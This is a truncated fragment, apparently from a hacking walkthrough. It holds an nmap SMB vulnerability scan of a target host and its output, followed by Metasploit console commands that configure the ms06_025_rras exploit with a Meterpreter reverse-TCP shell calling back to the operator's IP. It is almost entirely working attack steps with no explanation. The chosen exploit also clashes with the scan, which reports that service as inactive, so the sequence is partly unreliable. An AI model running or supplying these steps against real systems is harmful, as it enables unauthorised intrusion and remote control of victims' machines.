nmap --script smb-check-vulns.nse -p445 <host> sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 <host>Script Output
Host script results: | smb-check-vulns: | MS08-067: VULNERABLE | regsvc DoS: regsvc DoS: VULNERABLE | SMBv2 DoS (CVE-2009-3103): VULNERABLE | MS06-025: NO SERVICE (the Ras RPC service is inactive) |_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)$ msfconsole ## ### ## ## ## ## #### ###### #### ##### ##### ## #### ###### ####### ## ## ## ## ## ## ## ## ## ## ### ## ####### ###### ## ##### #### ## ## ## ## ## ## ## ## # ## ## ## ## ## ## ##### ## ## ## ## ## ## ## #### ### ##### ##### ## #### #### #### ### ## msf > use exploit/windows/smb/ms06_025_rras msf exploit(ms06_025_rras) > show payloads msf exploit(ms06_025_rras) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms06_025_rras) > set LHOST [MY IP ADDRESS] msf exploit(ms06_025_rras) > set RHOST [TARGET IP] msf exploit(ms06_025_rras) > show targets msf exploit(ms06_025_rras) > set TARGET [TARGET ID] msf exploit(ms06_025_rras) > ex
